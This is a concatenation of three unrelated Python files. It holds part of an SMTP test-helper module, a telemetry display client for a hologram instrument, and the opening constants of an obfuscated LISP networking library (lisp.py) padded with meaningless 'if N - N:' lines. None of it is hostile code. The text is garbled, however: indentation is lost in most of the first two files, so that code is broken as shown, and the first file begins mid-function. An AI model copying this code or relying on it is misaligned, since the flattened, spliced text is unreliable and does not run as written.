return ", ".join([formataddr((str(Header(name, "utf-8")), email))
for name, email in name_email_pairs])
def smtp_send_email(email, subject, from_addr, body, server_host="127.0.0.1", user=None, password=None,
emails=None, attachments=None, port=0, html_body=None):
msg = MIMEMultipart()
msg['To'] = email
msg['Subject'] = subject
msg['From'] = from_addr
msg['Date'] = formatdate(localtime=True)
msg.attach(MIMEText(body, _charset="utf8"))
if html_body:
msg.attach(MIMEText(html_body, "html", _charset="utf8"))
for name, data in attachments or []:
part = MIMEBase('application', "octet-stream")
part.set_payload(data)
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment', filename=(Header(name, 'utf-8').encode()))
msg.attach(part)
try:
s = smtplib.SMTP(server_host, port)
if user and password:
s.login(user, password)
if emails is None:
emails = [email]
s.sendmail(from_addr, emails, msg.as_string())
s.quit()
#print(u"Sent email to [%s] from [%s] with subject [%s]", email, from_addr, subject)
except (smtplib.SMTPConnectError, smtplib.SMTPException, IOError) as e:
print("Sending email error to [%s] from [%s] with subject [%s]:\n%s", email, from_addr, subject, e)
raise SendEmailError(e)
def send_email_plain(from_addr, to_addrs, msg, user=None, password=None, server_host="127.0.0.1", port=0):
try:
s = smtplib.SMTP(server_host, port)
if user and password:
s.login(user, password)
s.sendmail(from_addr, to_addrs, msg)
s.quit()
except (smtplib.SMTPConnectError, smtplib.SMTPException, IOError) as e:
print("Sending email error to [%s] from [%s] with subject [%s]:\n%s", to_addrs, from_addr, e)
raise SendEmailError(e)
class SmtpServerRunner(object):
def __init__(self, db_name):
self._process = None
self.db_name = db_name
def start(self, port=2025):
def wrapper(**kwargs):
lathermail.db.engine.switch_db(self.db_name)
lathermail.smtp.serve_smtp(**kwargs)
smtp_thread = Thread(target=wrapper, kwargs=dict(handler=lathermail.db.engine.message_handler, port=port))
smtp_thread.daemon = True
smtp_thread.start()
self.wait_start(port)
def wait_start(self, port):
timeout = 0.1
host_port = ("127.0.0.1", port)
for i in range(10):
try:
sock = socket.create_connection(host_port, timeout=timeout)
except Exception:
time.sleep(timeout)
continue
else:
sock.close()
return
raise Exception("Can't connect to %s" % str(host_port))
|
telem_display.py
|
import sys
import functools
import signal
import select
import socket
import numpy as np
import pickle
import matplotlib.pyplot as plt
import time
import datetime
from multiprocessing import Process, Queue
sys.path.append('../dhmsw/')
import interface
import telemetry_iface_ag
import struct
PLOT = True
headerStruct = struct.Struct('III')
class guiclient(object):
def __init__(self):
self.sock = None
self.displaythread = Process(target=self.DisplayThread)
self.displaythread.daemon = True
self.displayQ = Queue()
self.exit = False
self.maxlen = 150995023
for sig in [signal.SIGTERM, signal.SIGINT, signal.SIGHUP, signal.SIGQUIT]:
signal.signal(sig, self.signal_handler)
def signal_handler(self, signal, frame):
self.exit = True
self.displayQ.put(None)
    def restore_frame(self, data, meta, z):
        # Expand a subsampled frame: data holds every compval-th pixel of
        # the full w*h image; scatter them back into the flat buffer z.
        w, h, compval, val, size, actualsize, ts, gain, ccdtemp = meta
        dtidx = 0
        for i in range(0, w * h, compval):
            z[i] = data[dtidx]
            dtidx += 1
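    @staticmethod
    def _example_compress_frame(z, compval):
        # Hedged sketch (not in the original file): the inverse of
        # restore_frame() above -- keep every compval-th pixel, i.e. the
        # subsampling that restore_frame() undoes.
        return z[::compval]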
def DisplayThread(self):
if PLOT:
f, axes = plt.subplots(sharex=True)
for i in range(1):
#axes[i].imshow(z, extent=[0,2448,0,2050], aspect="auto", cmap='gray')
axes.clear()
#axes.imshow(z, extent=[0,2448,0,2050], aspect="auto", cmap='gray')
reconst_telemetry = telemetry_iface_ag.Reconstruction_Telemetry()
heartbeat_telemetry = telemetry_iface_ag.Heartbeat_Telemetry()
framesource_telemetry = telemetry_iface_ag.Framesource_Telemetry()
datalogger_telemetry = telemetry_iface_ag.Datalogger_Telemetry()
guiserver_telemetry = telemetry_iface_ag.Guiserver_Telemetry()
session_telemetry = telemetry_iface_ag.Session_Telemetry()
hologram_telemetry = telemetry_iface_ag.Hologram_Telemetry()
fouriermask_telemetry = telemetry_iface_ag.Fouriermask_Telemetry()
while True:
msg = self.displayQ.get()
if msg is None:
break
#print("**************** Display Thread")
msgid, srcid, totalbytes= headerStruct.unpack(msg[0:struct.calcsize(headerStruct.format)])
meta = (msgid, srcid, totalbytes)
offset = struct.calcsize(headerStruct.format)
#print('offset=%d'%(offset))
data = None
if srcid == interface.SRCID_TELEMETRY_RECONSTRUCTION:
print('Received RECONSTRUCTION Telemetry')
data = reconst_telemetry.unpack_from(msg, offset=offset)
elif srcid == interface.SRCID_TELEMETRY_HEARTBEAT:
data = heartbeat_telemetry.unpack_from(msg, offset=offset)
elif srcid == interface.SRCID_TELEMETRY_FRAMESOURCE:
data = framesource_telemetry.unpack_from(msg, offset=offset)
print('Framesource state: ', data.state)
elif srcid == interface.SRCID_TELEMETRY_SESSION:
data = session_telemetry.unpack_from(msg, offset=offset)
elif srcid == interface.SRCID_TELEMETRY_DATALOGGER:
data = datalogger_telemetry.unpack_from(msg, offset=offset)
elif srcid == interface.SRCID_TELEMETRY_HOLOGRAM:
data = hologram_telemetry.unpack_from(msg, offset=offset)
elif srcid == interface.SRCID_TELEMETRY_GUISERVER:
data = guiserver_telemetry.unpack_from(msg, offset=offset)
elif srcid == interface.SRCID_TELEMETRY_FOURIERMASK:
data = fouriermask_telemetry.unpack_from(msg, offset=offset)
if PLOT:
mask = np.frombuffer(data.mask, dtype=np.uint8).reshape((2048,2048))
#mask = np.asarray(data.mask,dtype=np.int8).reshape((2048,2048))
axes.clear()
#axes.imshow(mask[:,:], extent=[2048,0,0,2048], aspect="auto")
axes.imshow(mask[:,:], aspect="auto")
plt.suptitle(repr(time.time()))
#axes.set_ylim(axes.get_ylim()[::-1])
plt.draw()
plt.pause(0.001)
else:
print('Unknown Telemetry')
if data and srcid != interface.SRCID_TELEMETRY_HEARTBEAT:
print(time.time(), datetime.datetime.now())
print(data)
pass
print('End of DisplayThread')
def connect_to_server(self, server, port):
#headerStruct = struct.Struct('HHBIIIHH')
totlen = 0
count = 0
        ### Continuous receive of data
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((server, port))
self.readfds = [self.sock]
### Start Display Thread
self.displaythread.start()
length = None
buf = b''
data = b''
msg=b''
lasttime = time.time()
meta = None
totalbytes = 0
while True:
infds, outfds, errfds = select.select(self.readfds, [], [], 5)
if not (infds or outfds or errfds):
continue
if self.exit: break
for s in infds:
if s is self.sock:
### Get as much data as we can
packet = self.sock.recv(255)
if not packet:
self.exit = True
self.displayQ.put_nowait(None)
break
data += packet
datalen = len(data)
#print('len packet= %d'%(len(packet)))
                    ### If we haven't processed the header/meta yet, do it now.
#if meta is None and datalen > struct.calcsize(headerStruct.format)+25:
if meta is None and datalen >= struct.calcsize(headerStruct.format):
#packet = self.sock.recv(12)
#print("Recieve: %s"%(':'.join("{:02x}".format(ord(c)) for c in packet[0:50])))
msg_id, srcid, totalbytes = headerStruct.unpack(data[0:struct.calcsize(headerStruct.format)])
totalbytes += struct.calcsize(headerStruct.format)
meta = (msg_id, srcid)
#print('msg_id=%d, srcid=%d, totalbytes=%d'%(msg_id, srcid, totalbytes))
if datalen >= totalbytes: ### We have a complete packet stored.
msg = data[:totalbytes]
data = data[totalbytes:]
meta = None
totalbytes = 0
#print('%.2f Hz'%(1/(time.time()-lasttime)))
lasttime = time.time()
#plt.show(block=False)
count+=1
self.displayQ.put_nowait(msg)
#print('Full message received after getting meta: datalen=%d, datalen after=%d'%(datalen, len(data)))
else:
if datalen < totalbytes:
continue
### We have a complete message
msg = data[:totalbytes]
data = data[totalbytes:]
#print('Full message received: datalen=%d, datalen after=%d'%(datalen, len(data)))
meta = None
totalbytes = 0
self.displayQ.put_nowait(msg)
#print('%.2f Hz'%(1/(time.time()-lasttime)))
lasttime = time.time()
count+=1
if self.exit: break
self.sock.close()
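    @staticmethod
    def _example_pack_message(msgid, srcid, payload):
        # Hedged sketch (not in the original file): build one wire message
        # in the framing connect_to_server() parses -- a struct 'III'
        # header of (msgid, srcid, payload_length) followed by the payload
        # bytes; the receiver adds the header size itself to get the full
        # message length.
        return headerStruct.pack(msgid, srcid, len(payload)) + payload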
if __name__ == "__main__":
a = guiclient()
host= socket.gethostbyname('localhost')
port = 9996
print("Client host: %s: port: %d"%(host, port))
a.connect_to_server(host, port)
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
from __future__ import print_function
from __future__ import division
from future import standard_library
standard_library . install_aliases ( )
from builtins import chr
from builtins import hex
from builtins import str
from builtins import range
from builtins import object
from past . utils import old_div
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import traceback
from Crypto . Cipher import AES
import ecdsa
import json
import copy
import chacha
import poly1305
import geopy
import curve25519
from subprocess import getoutput
import queue
import distro
if 64 - 64: i11iIiiIii
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
lisp_print_rloc_probe_list = False
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
if 60 - 60: iIii1I11I1II1 / i1IIi * oO0o - I1ii11iIi11i + o0oOOo0O0Ooo
if 94 - 94: i1IIi % Oo0Ooo
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
if 68 - 68: Ii1I / O0
lisp_map_notify_queue = { }
lisp_map_servers_list = { }
lisp_ddt_map_requestQ = { }
lisp_db_list = [ ]
lisp_group_mapping_list = { }
lisp_map_resolvers_list = { }
lisp_rtr_list = { }
lisp_elp_list = { }
lisp_rle_list = { }
lisp_geo_list = { }
lisp_json_list = { }
lisp_myrlocs = [ None , None , None ]
lisp_mymacs = { }
if 46 - 46: O0 * II111iiii / IiII * Oo0Ooo * iII111i . I11i
if 62 - 62: i11iIiiIii - II111iiii % I1Ii111 - iIii1I11I1II1 . I1ii11iIi11i . II111iiii
if 61 - 61: oO0o / OoOoOO00 / iII111i * OoO0O00 . II111iiii
if 1 - 1: II111iiii - I1ii11iIi11i % i11iIiiIii + IiII . I1Ii111
if 55 - 55: iIii1I11I1II1 - I1IiiI . Ii1I * IiII * i1IIi / iIii1I11I1II1
lisp_myinterfaces = { }
lisp_iid_to_interface = { }
lisp_multi_tenant_interfaces = [ ]
if 79 - 79: oO0o + I1Ii111 . ooOoO0o * IiII % I11i . I1IiiI
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
if 94 - 94: iII111i * Ii1I / IiII . i1IIi * iII111i
if 47 - 47: i1IIi % i11iIiiIii
if 20 - 20: ooOoO0o * II111iiii
if 65 - 65: o0oOOo0O0Ooo * iIii1I11I1II1 * ooOoO0o
lisp_registered_count = 0
if 18 - 18: iIii1I11I1II1 / I11i + oO0o / Oo0Ooo - II111iiii - I11i
if 1 - 1: I11i - OOooOOo % O0 + I1IiiI - iII111i / I11i
if 31 - 31: OoO0O00 + II111iiii
if 13 - 13: OOooOOo * oO0o * I1IiiI
lisp_info_sources_by_address = { }
lisp_info_sources_by_nonce = { }
if 55 - 55: II111iiii
if 43 - 43: OoOoOO00 - i1IIi + I1Ii111 + Ii1I
if 17 - 17: o0oOOo0O0Ooo
if 64 - 64: Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
lisp_crypto_keys_by_nonce = { }
lisp_crypto_keys_by_rloc_encap = { }
lisp_crypto_keys_by_rloc_decap = { }
lisp_data_plane_security = False
lisp_search_decap_keys = True
if 78 - 78: OoO0O00
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
if 14 - 14: I11i % O0
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
if 42 - 42: oO0o - i1IIi / i11iIiiIii + OOooOOo + OoO0O00
lisp_crypto_ephem_port = None
if 17 - 17: oO0o . Oo0Ooo . I1ii11iIi11i
if 3 - 3: OoOoOO00 . Oo0Ooo . I1IiiI / Ii1I
if 38 - 38: II111iiii % i11iIiiIii . ooOoO0o - OOooOOo + Ii1I
if 66 - 66: OoooooooOO * OoooooooOO . OOooOOo . i1IIi - OOooOOo
lisp_pitr = False
if 77 - 77: I11i - iIii1I11I1II1
if 82 - 82: i11iIiiIii . OOooOOo / Oo0Ooo * O0 % oO0o % iIii1I11I1II1
if 78 - 78: iIii1I11I1II1 - Ii1I * OoO0O00 + o0oOOo0O0Ooo + iII111i + iII111i
if 11 - 11: iII111i - OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
lisp_l2_overlay = False
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
lisp_rloc_probing = False
lisp_rloc_probe_list = { }
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
lisp_register_all_rtrs = True
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
lisp_nonce_echoing = False
lisp_nonce_echo_list = { }
if 83 - 83: OoooooooOO
if 31 - 31: II111iiii - OOooOOo . I1Ii111 % OoOoOO00 - O0
if 4 - 4: II111iiii / ooOoO0o . iII111i
if 58 - 58: OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - I1ii11iIi11i / oO0o
lisp_nat_traversal = False
if 50 - 50: I1IiiI
if 34 - 34: I1IiiI * II111iiii % iII111i * OoOoOO00 - I1IiiI
if 33 - 33: o0oOOo0O0Ooo + OOooOOo * OoO0O00 - Oo0Ooo / oO0o % Ii1I
if 21 - 21: OoO0O00 * iIii1I11I1II1 % oO0o * i1IIi
if 16 - 16: O0 - I1Ii111 * iIii1I11I1II1 + iII111i
if 50 - 50: II111iiii - ooOoO0o * I1ii11iIi11i / I1Ii111 + o0oOOo0O0Ooo
if 88 - 88: Ii1I / I1Ii111 + iII111i - II111iiii / ooOoO0o - OoOoOO00
if 15 - 15: I1ii11iIi11i + OoOoOO00 - OoooooooOO / OOooOOo
lisp_program_hardware = False
if 58 - 58: i11iIiiIii % I11i
if 71 - 71: OOooOOo + ooOoO0o % i11iIiiIii + I1ii11iIi11i - IiII
if 88 - 88: OoOoOO00 - OoO0O00 % OOooOOo
if 16 - 16: I1IiiI * oO0o % IiII
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
if 86 - 86: I1IiiI + Ii1I % i11iIiiIii * oO0o . ooOoO0o * I11i
if 44 - 44: oO0o
if 88 - 88: I1Ii111 % Ii1I . II111iiii
if 38 - 38: o0oOOo0O0Ooo
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
if 57 - 57: O0 / oO0o * I1Ii111 / OoOoOO00 . II111iiii
if 26 - 26: iII111i
if 91 - 91: OoO0O00 . I1ii11iIi11i + OoO0O00 - iII111i / OoooooooOO
if 39 - 39: I1ii11iIi11i / ooOoO0o - II111iiii
if 98 - 98: I1ii11iIi11i / I11i % oO0o . OoOoOO00
lisp_ipc_lock = None
if 91 - 91: oO0o % Oo0Ooo
if 64 - 64: I11i % iII111i - I1Ii111 - oO0o
if 31 - 31: I11i - II111iiii . I11i
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
lisp_default_iid = 0
lisp_default_secondary_iid = 0
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
lisp_ms_rtr_list = [ ]
if 68 - 68: OoO0O00 * OoooooooOO % O0 + OoO0O00 + ooOoO0o
if 4 - 4: ooOoO0o + O0 * OOooOOo
if 55 - 55: Oo0Ooo + iIii1I11I1II1 / OoOoOO00 * oO0o - i11iIiiIii - Ii1I
if 25 - 25: I1ii11iIi11i
if 7 - 7: i1IIi / I1IiiI * I1Ii111 . IiII . iIii1I11I1II1
if 13 - 13: OOooOOo / i11iIiiIii
lisp_nat_state_info = { }
if 2 - 2: I1IiiI / O0 / o0oOOo0O0Ooo % OoOoOO00 % Ii1I
if 52 - 52: o0oOOo0O0Ooo
if 95 - 95: Ii1I
if 87 - 87: ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
if 91 - 91: O0
if 61 - 61: II111iiii
lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time . time ( )
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
lisp_last_icmp_too_big_sent = 0
if 10 - 10: I1ii11iIi11i % I1ii11iIi11i - iIii1I11I1II1 / OOooOOo + Ii1I
if 87 - 87: oO0o * I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
if 83 - 83: I11i / I1IiiI
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = [ ]
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
lisp_policies = { }
if 68 - 68: OoOoOO00 - OoO0O00
if 28 - 28: OoO0O00 . OOooOOo / OOooOOo + Oo0Ooo . I1ii11iIi11i
if 1 - 1: iIii1I11I1II1 / II111iiii
if 33 - 33: I11i
if 18 - 18: o0oOOo0O0Ooo % iII111i * O0
lisp_load_split_pings = False
if 87 - 87: i11iIiiIii
if 93 - 93: I1ii11iIi11i - OoO0O00 % i11iIiiIii . iII111i / iII111i - I1Ii111
if 9 - 9: I1ii11iIi11i / Oo0Ooo - I1IiiI / OoooooooOO / iIii1I11I1II1 - o0oOOo0O0Ooo
if 91 - 91: iII111i % i1IIi % iIii1I11I1II1
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
lisp_eid_hashes = [ ]
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
lisp_reassembly_queue = { }
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
lisp_pubsub_cache = { }
if 77 - 77: iIii1I11I1II1 * OoO0O00
if 95 - 95: I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
if 53 - 53: II111iiii
lisp_decent_push_configured = False
if 31 - 31: OoO0O00
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: OoO0O00
if 62 - 62: OOooOOo + O0
if 98 - 98: o0oOOo0O0Ooo
if 51 - 51: Oo0Ooo - oO0o + II111iiii * Ii1I . I11i + oO0o
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
if 78 - 78: i11iIiiIii / iII111i - Ii1I / OOooOOo + oO0o
if 82 - 82: Ii1I
if 46 - 46: OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
lisp_ipc_socket = None
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
if 100 - 100: I1Ii111 * O0
if 64 - 64: OOooOOo % iIii1I11I1II1 * oO0o
lisp_ms_encryption_keys = { }
lisp_ms_json_keys = { }
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
if 29 - 29: iIii1I11I1II1 + OoOoOO00 * OoO0O00 * OOooOOo . I1IiiI * I1IiiI
if 7 - 7: IiII * I1Ii111 % Ii1I - o0oOOo0O0Ooo
if 13 - 13: Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
lisp_rtr_nat_trace_cache = { }
if 69 - 69: O0 . OoO0O00
if 49 - 49: I1IiiI - I11i
if 74 - 74: iIii1I11I1II1 * I1ii11iIi11i + OoOoOO00 / i1IIi / II111iiii . Oo0Ooo
if 62 - 62: OoooooooOO * I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
lisp_glean_mappings = [ ]
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
if 54 - 54: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo / oO0o - OoO0O00 . I11i
if 11 - 11: I1ii11iIi11i . OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
lisp_gleaned_groups = { }
if 26 - 26: Ii1I % I1ii11iIi11i
if 76 - 76: IiII * iII111i
if 52 - 52: OOooOOo
if 19 - 19: I1IiiI
if 25 - 25: Ii1I / ooOoO0o
lisp_icmp_raw_socket = None
if ( os . getenv ( "LISP_SEND_ICMP_TOO_BIG" ) != None ) :
lisp_icmp_raw_socket = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_ICMP )
lisp_icmp_raw_socket . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
if 71 - 71: I1Ii111 . II111iiii
lisp_ignore_df_bit = ( os . getenv ( "LISP_IGNORE_DF_BIT" ) != None )
if 62 - 62: OoooooooOO . I11i
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434

LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9

LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
LISP_SEND_PUBSUB_ACTION = 6

lisp_map_reply_action_string = ["no-action", "native-forward",
    "send-map-request", "drop-action", "policy-denied",
    "auth-failure", "send-subscribe"]

LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32

LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16

LISP_MR_TTL = (24 * 60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240

LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60
LISP_TEST_MR_INTERVAL = 60
LISP_MAP_NOTIFY_INTERVAL = 2
LISP_DDT_MAP_REQUEST_INTERVAL = 2
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15
LISP_MAP_REQUEST_RATE_LIMIT = .5
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60
